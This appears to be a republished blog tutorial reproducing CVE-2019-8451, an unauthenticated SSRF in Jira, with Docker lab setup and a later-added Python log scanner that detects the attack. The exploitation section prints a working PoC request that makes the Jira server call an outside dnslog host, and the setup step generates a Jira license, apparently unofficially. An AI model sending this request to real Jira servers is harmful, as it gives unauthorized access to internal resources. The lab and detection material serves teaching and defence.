Example Analysis: Reproducing CVE-2019-8451, an Unauthorized SSRF Vulnerability in Jira

2025-02-21 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

In this issue, the editor brings you an example analysis that reproduces CVE-2019-8451, the vulnerability caused by unauthorized SSRF in Jira. The article is rich in content and analyzes and describes the issue from a professional point of view. I hope you get something out of reading it.

0x00 Introduction

JIRA is a project and transaction tracking tool produced by Atlassian, which is widely used in defect tracking, customer service, requirements collection, process approval, task tracking, project tracking and agile management.

0x01 Vulnerability overview

There is an SSRF vulnerability in the /plugins/servlet/gadgets/makeRequest resource of Jira, caused by a logic flaw in the class JiraWhitelist. A remote attacker who successfully exploits this vulnerability can access intranet resources as the Jira server. According to analysis, this vulnerability can be triggered without any credentials. (from Qianxin CERT)

0x02 Affected versions

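Jira < 8.4.0

0x03 Environment setup

Online range

Open period: from now until 20:00 on September 29. How to get access (complete either one):

1. Share this article to your WeChat Moments with a caption, and send a screenshot to the public account.
2. Contact the author, with a five-yuan red envelope.

Self-hosted setup

Build the environment with Docker. Run the following commands to start it:

    docker pull cptactionhank/atlassian-jira:7.8.0
    docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0

Visit ip:8080 to run the installation. In the figure below, choose the second option, then continue.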

Click next, and two pictures are missing.

Generate a JIRA license.

After generation, find License Key, go back to the page and fill in License Key to continue the installation.

At this point, the installation is complete.

0x04 Vulnerability exploitation

Visit ip:8080 first, then refresh the page and capture the request.

Replace the request with the following PoC:

    GET /plugins/servlet/gadgets/makeRequest?url=http://192.168.198.133:8080@bgkwd5.dnslog.cn HTTP/1.1
    Host: 192.168.198.133:8080
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://192.168.198.133:8080/secure/Dashboard.jspa
    X-Atlassian-Token: no-check
    Content-Length: 2

Replace the IP with the target IP in all three places.

Change the address after @ to your own dnslog address.

Send the request from Repeater.

Go to dnslog, refresh and check the results; you can see that traffic has come through.
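
Added example (not part of the original article and not Atlassian's code): a Python log check for the request shape used in the PoC above. It parses the url parameter the way an HTTP client does, so the text before @ is treated as user-info and the real destination is the host after it. The log format, host names, allow-list and function names are assumptions constructed for illustration.

```python
# Added example: flag makeRequest calls whose url= value resolves to a host
# other than the one it appears to name (the "allowed-host@other-host" shape).
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/plugins/servlet/gadgets/makeRequest"

def check_request(request_target, allowed_hosts):
    """Return a finding dict for a suspicious makeRequest call, else None.

    allowed_hosts is an assumed set of lowercase hostnames Jira may fetch from.
    """
    parts = urlsplit(request_target)
    if parts.path.rstrip("/").lower() != ENDPOINT.lower():
        return None
    for url in parse_qs(parts.query).get("url", []):  # parse_qs decodes %40
        try:
            target = urlsplit(url.strip())
        except ValueError:  # unparseable authority: report it for review
            return {"url": url, "connects_to": None, "userinfo": False}
        host = (target.hostname or "").lower()  # host after any "@"
        has_userinfo = "@" in target.netloc
        if has_userinfo or host not in allowed_hosts:
            return {"url": url, "connects_to": host, "userinfo": has_userinfo}
    return None

def scan_access_log(lines, allowed_hosts):
    """Scan access-log lines whose request is quoted as "METHOD target PROTO"."""
    findings = []
    for line in lines:
        try:
            _method, target, _proto = line.split('"')[1].split(" ", 2)
            hit = check_request(target, allowed_hosts)
        except (IndexError, ValueError):
            continue  # not a request line in the assumed format
        if hit:
            findings.append({**hit, "client": line.split(" ", 1)[0]})
    return findings

# Constructed sample lines (hosts and addresses are placeholders).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Oct/2019:10:00:00 +0000] "GET /secure/Dashboard.jspa HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Oct/2019:10:00:05 +0000] "GET /plugins/servlet/gadgets/makeRequest?url=http://jira.example.test:8080@collector.example.test HTTP/1.1" 200 90',
    '10.0.0.5 - - [01/Oct/2019:10:00:09 +0000] "GET /plugins/servlet/gadgets/makeRequest?url=http://jira.example.test:8080/rest/gadgets/1.0/g/feed HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG, {"jira.example.test"}):
        print(finding)
```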

If the access port is not open, the result is as follows:

The above is the example analysis, shared by the editor, that reproduces CVE-2019-8451, the vulnerability caused by unauthorized SSRF in Jira. If you have similar questions, refer to the analysis above. If you want to know more, you are welcome to follow the industry information channel.
